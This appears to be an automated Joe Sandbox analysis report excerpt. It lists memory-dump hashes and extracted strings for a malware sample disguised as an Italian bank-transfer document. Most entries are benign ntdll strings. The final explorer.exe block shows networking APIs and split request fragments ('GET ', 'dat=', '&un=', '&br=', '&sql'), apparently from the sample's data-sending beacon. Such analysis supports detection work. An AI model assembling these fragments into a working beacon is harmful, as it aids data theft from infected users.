                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                  • Instruction ID: ff12f416a7574b72802b2f7718b4ce3e5a0856b1c7c290d9faea54c10fbf0769
                                  • Opcode Fuzzy Hash: 2661a12015ab8e791fa8ab491730d49148a19d7b7b0c3a2ce83b8e22292defae
                                  • Instruction Fuzzy Hash: 9390023224140803D10871585904686500597D1301F55C021A6025655ED76589917231
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                  • Instruction ID: 550810e239b6f4b896545221ce01addd27b3723161648bd3776f7040be106d7b
                                  • Opcode Fuzzy Hash: 568af7d27fb556a5a731716940bec982d98acbaedc2f1392601c4a6edefd1f7b
                                  • Instruction Fuzzy Hash: 7D90043374540C03D154715C55147475005D7D1301F55C031F0035754DC755CF5577F1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                  • Instruction ID: 97877d6c91219591bd12e7d1dd2b4eac425d77bcdf2bdc6e0c3c4c335419a7e2
                                  • Opcode Fuzzy Hash: 1b2f64c39ece18165fa99610b6d1ed4522c736752b10eedcdb90fa9037a29eae
                                  • Instruction Fuzzy Hash: F590023224544843D14471585504A46501597D1305F55C021A0065694DD7258E55B761
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                  • Instruction ID: c9c530cb973e42d95beb1f9e224c5bf2cd66ff089d1ff0983ff058172db95bbe
                                  • Opcode Fuzzy Hash: fc860519aa00df43a2a73c607d944888fcc2f84d36e6c6ce6bf7f6fcb9593392
                                  • Instruction Fuzzy Hash: 799002A2241540934504B2589504B0A950597E1201B55C026E1055560CC72589519235
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                  • Instruction ID: dc4be5a693b4d38fe544e53a4140bcc043192ba89b111bd58d33c8bb7d61e163
                                  • Opcode Fuzzy Hash: 2f1d5078d01bd52d9d0181bd0efcc163ba2b31800a71a432d461cc0e37b7ff04
                                  • Instruction Fuzzy Hash: 33900226261400030149B558170450B5445A7D7351395C025F1417590CC72189655321
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                  • Instruction ID: 5f2916861beb95296237e69b3f49abf2fdbefe9067a16957191b3f721cebb7a5
                                  • Opcode Fuzzy Hash: 9679a6bc2eb015a7cc0f030e7cd8a0885b52ee20e17825562b0800319facff9d
                                  • Instruction Fuzzy Hash: EA90022224544443D10475586508A06500597D1205F55D021A1065595DC7358951A231
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                  • Instruction ID: 787a4aed12bf7886bc9b8e06d57cbdc5523ab0a3adac16be8efa15ad27a44121
                                  • Opcode Fuzzy Hash: e15ab511638d6faeeb164fbc3d1788ac82d6f20eb0e222b98b802bf06d11c3a3
                                  • Instruction Fuzzy Hash: D990023228140403D145715855046065009A7D1241F95C022A0425554EC7558B56AB61
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                  • Instruction ID: 29aac188d4509ca1455d9230fb1b47e64c9571f2110d82886d50a520443d1671
                                  • Opcode Fuzzy Hash: 140ef87a71b8bd9cb3d6ea81f3ef33a29c003097398c5084fa9ca7dc17a50c8f
                                  • Instruction Fuzzy Hash: 4290023224140843D10471585504B46500597E1301F55C026A0125654DC715C9517621
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                  • Instruction ID: 78b2b9eb1fa237f2233a76ef59166e54f4543b95492a79e5a7cdf39602d61080
                                  • Opcode Fuzzy Hash: 411603b48dd9f13e37b6dfcc4f42456c3bbc9a3b015660145767c38dacf357c0
                                  • Instruction Fuzzy Hash: 2490022264540403D14471586518706501597D1201F55D021A0025554DC7598B5567A1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                  • Instruction ID: 0030b9bab048ce429ce0b2db464ba6e72d8b04f5760cf4fb8c5a25ae1b3739fe
                                  • Opcode Fuzzy Hash: e34036a6a2e3dc16af5f10b3e1ba5fde9e43959072de65fc822bd6fae6735708
                                  • Instruction Fuzzy Hash: C890023224140403D10471586608707500597D1201F55D421A0425558DD75689516221
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                  • Instruction ID: fe62917135f8277d9370e2283f53a642b8ca8257623bdac97aaefa987288aa54
                                  • Opcode Fuzzy Hash: 6d02b82c094903734084a83522eb6cd27ac412df20db90b30235e37dbf3ef38c
                                  • Instruction Fuzzy Hash: F590026225140043D10871585504706504597E2201F55C022A2155554CC7298D615225
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                  • Instruction ID: 0abadae0f4569bb43f76ed64f639660d3f1e436cea46ca5ba693624b40bf1b03
                                  • Opcode Fuzzy Hash: 77c118963d2624c084ae15b8ddab0dace5dda42368adcba20b4766eea79810f5
                                  • Instruction Fuzzy Hash: D390023224180403D10471585908747500597D1302F55C021A5165555EC765C9916631
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                  • Instruction ID: b558e018a7cac82cbb0d2a815f6ceca0e96e51e2a280bc2d74cf56e17785a3ff
                                  • Opcode Fuzzy Hash: ccff097e4dc6e6e6f837f8bfdb6ea8e1451c23d1d0594d74debb15377342b065
                                  • Instruction Fuzzy Hash: F290022234140403D106715855146065009D7D2345F95C022E1425555DC7258A53A232
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                  • Instruction ID: 135fc5a81e36f4d6afc4f03d69dfd01745a101aff359b5fb7dd1bc3f595d7a86
                                  • Opcode Fuzzy Hash: e3126dfd2dfcab96e38fac551984f32555fdf4115e7ff6f8f9c23ab15d1845e4
                                  • Instruction Fuzzy Hash: 8790026224180403D14475585904607500597D1302F55C021A2065555ECB298D516235
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                  • Instruction ID: ba2ee439b051f058ac9b72c3befa8ba3ead4d6deb9d92c922ae926c20d4b3b33
                                  • Opcode Fuzzy Hash: c2f6e64b4a47feaa60a8627b593e6438c3e4bf40225855da5d28cb478a300814
                                  • Instruction Fuzzy Hash: 3A90022224184443D14472585904B0F910597E2202F95C029A4157554CCB1589555721
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                  • Instruction ID: 9ff1019f4df565ef91e79f655176ada9e6cf997fc154deb8236911a6644cdc5b
                                  • Opcode Fuzzy Hash: 24b57115ff2b8623ef7bdf8deb69003de406a28ef06cc4559150d4375119cd93
                                  • Instruction Fuzzy Hash: 6C90022228140803D144715895147075006D7D1601F55C021A0025554DC7168A6567B1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                  • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                  • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                  • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                  • Instruction ID: 74b9ef6855463ccaedf3495868ae146c0453b58f9c0941cad428be937e43eb05
                                  • Opcode Fuzzy Hash: 8cd53e7c9bbfbf0876734f7bf2a8202224d1aebd3f7b48bb2fa6523422756a72
                                  • Instruction Fuzzy Hash: 3990022228545103D154715C55046169005B7E1201F55C031A0815594DC75589556321
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                  • Instruction ID: ebc52a100e29200ec724765ea6f91da961181937cb5dd548493885820925476b
                                  • Opcode Fuzzy Hash: 04e88cae0ce05dc008b693059aa2b89eceeb18fc97fb84e433be412c331ee26c
                                  • Instruction Fuzzy Hash: 1090023224240143954472586904A4E910597E2302B95D425A0016554CCB1489615321
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                  • Instruction ID: d39b0ae3ab75aec6a77046b35bcff3b0f27c41bf8becacb4bd7af50c9717c1df
                                  • Opcode Fuzzy Hash: 49d1ca7000732afba8bb116fc7363c69f55132d1ec676e9e8da8ce1cf36ff0ba
                                  • Instruction Fuzzy Hash: 2490023624140403D51471586904646504697D1301F55D421A0425558DC75489A1A221
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 1ba76a7c44a8124a06d03aa55a5ac600dc89aa48237e38d5e859caaf06bfd800
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                  • Instruction ID: fbf3b95a6427e36ca3ca0ef8e0a7a370e94793c7d415c7b8879e2a55fc7f33eb
                                  • Opcode Fuzzy Hash: f71855fdfa298b446ecaa21e8c46ac482417c84bead8a16931c6042eade4d19a
                                  • Instruction Fuzzy Hash: C351FBB5E00116BFCB1ADB5CC89497EFBF8BF48240714816AF595D7685E374DE4087A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                  • Instruction ID: 18996b3cf45ba46cd745311dad0b2e806d010b8bb2895075990dbbf11974460c
                                  • Opcode Fuzzy Hash: b5a3c83794f819075fc8dbc748db04bbf19e4aa6610140fd0de71dbdfaf53352
                                  • Instruction Fuzzy Hash: B151F571A04646AECB38DF5CC8909BFBBF8EB48204B148469F5D6D7741E7B4EA41C760
                                  Strings
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01134725
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01134655
                                  • Execute=1, xrefs: 01134713
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01134742
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01134787
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 011346FC
                                  • ExecuteOptions, xrefs: 011346A0
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                  • Instruction ID: 41b98b34a775e4e636076482a87e7652e30a7b191adbf4f7e6ec7e6845f1cf4c
                                  • Opcode Fuzzy Hash: f347a0758c9b40d87b30630c500b272e9fc4457a231cedf352f5856fb5028917
                                  • Instruction Fuzzy Hash: 22511931A0021A6AEF25EBA8DC86FED77A8EF58704F0400EDD745AB5D1E7709A41CF52
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: eeabe8a47d1a83e4402f02411c66318af36769c037ee9d8236b48dcdc7247f79
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 1781D378E092498EEF2FCE6CC8517FEBBB1AF45320F18455AD861A72D1C7B48940CB59
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 0113031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011302BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011302E7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                  • Instruction ID: 18a044f6b6f308b364f7cb3337da8736f8bb5a887f2a1e87bebc9e57c3e002c6
                                  • Opcode Fuzzy Hash: 16d5e37359ee320d0de2f0d76c28aded6b2ff6490dc36c58b6bdb8ce2c3db30a
                                  • Instruction Fuzzy Hash: 98E190706087429FE729CF29C888B2ABBE0BF88714F144A5DF5A58B2E1D774D945CB42
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 01137BAC
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01137B7F
                                  • RTL: Resource at %p, xrefs: 01137B8E
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                  • Instruction ID: 9004b9c06e85b2910b020b3a57ca4499e4b68828d51e58053dc660a52c80193c
                                  • Opcode Fuzzy Hash: 0f7667183aa106eef43bcba0a2c3947c948a736947cb3a18955e0a72eaaff01f
                                  • Instruction Fuzzy Hash: FF41D3357047029FD729DE29CC41B6AB7E5EF98710F100A1DEA9A9BA80DB71E4058F91
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01137294
                                  • RTL: Re-Waiting, xrefs: 011372C1
                                  • RTL: Resource at %p, xrefs: 011372A3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                  • Instruction ID: 76a9ff83bb737cb3d79a00de6cd3847aa750f2b22ef56ec07f8586dde39063bc
                                  • Opcode Fuzzy Hash: d683c60ab89a6d41cd403946ab3c528e17b3d669f2cbd436b733cd7542ba3a63
                                  • Instruction Fuzzy Hash: 4E410271700203ABD729DE29CC42F6AB7A5FF94714F10061DFA95AB680DB31F8428BD1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                  • Instruction ID: dff2f91dd3d7c75f27f877311d446bbc30eaa769310df555791f991065951048
                                  • Opcode Fuzzy Hash: 5dfaa8022e3c234c0eeadc3162bdf4297d169df771eff65c10b930dd524c5713
                                  • Instruction Fuzzy Hash: 83317572A002199FDB24DF2DDC40BEEB7F8EF58614F54455AE949E7240EB30AA458BA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 5f450c6c40fd46670a887fced3e3fc4d694720ccd108c48e57e4f820ce4c57a1
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: F791C570E002169BDF2EDF6DC8806BEBBA5BF44320F14451EE9A5A72C4D7B0AD408B52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                  • Instruction ID: fd367e354c0f1ce59b8e389373f3948d16b3c581cf0c5527d2a68e180d89bac1
                                  • Opcode Fuzzy Hash: 7ffbcaf9a608608ce6ede075e168668b08a469500af0d747710b9c1584d060f3
                                  • Instruction Fuzzy Hash: 06811C72D002699BDB35CB54CC45BEEBBB8AB48754F0041EAEA59B7240D7705E85CFA0

                                  Execution Graph

                                  Execution Coverage:2.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.7%
                                  Total number of Nodes:444
                                  Total number of Limit Nodes:16

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: getaddrinforecvsetsockopt
                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                  • API String ID: 1564272048-1117930895
                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction ID: 141ddb673397ce4b791bffd37a0f6f3d1215310dd427f96bf5c91893773e2411
